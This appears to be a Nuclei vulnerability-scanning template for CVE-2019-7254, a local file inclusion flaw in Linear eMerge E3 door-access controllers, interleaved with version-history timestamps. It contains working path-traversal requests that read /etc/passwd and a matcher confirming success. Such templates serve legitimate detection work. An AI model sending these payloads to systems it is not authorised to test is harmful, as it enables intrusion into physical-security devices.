2021-06-13 10:05:02 +00:00
|
|
|
id: CVE-2019-7254
|
|
|
|
|
|
|
|
info:
|
2022-07-26 13:45:11 +00:00
|
|
|
name: eMerge E3 1.00-06 - Local File Inclusion
|
2021-06-13 10:05:02 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-07-26 13:45:11 +00:00
|
|
|
description: Linear eMerge E3-Series devices are vulnerable to local file inclusion.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/47616
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://applied-risk.com/labs/advisories
|
|
|
|
- https://www.applied-risk.com/resources/ar-2019-005
|
|
|
|
- http://packetstormsecurity.com/files/155252/Linear-eMerge-E3-1.00-06-Directory-Traversal.html
|
2022-07-26 13:45:11 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-7254
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
2022-05-17 09:18:12 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2019-7254
|
|
|
|
cwe-id: CWE-22
|
2023-04-12 10:55:48 +00:00
|
|
|
epss-score: 0.83105
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: emerge,lfi,edb,packetstorm,cve,cve2019
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2021-06-13 10:05:02 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-06-13 10:05:02 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/?c=../../../../../../etc/passwd%00"
|
|
|
|
- "{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-06-13 10:05:02 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-07-26 13:45:11 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/07/08
|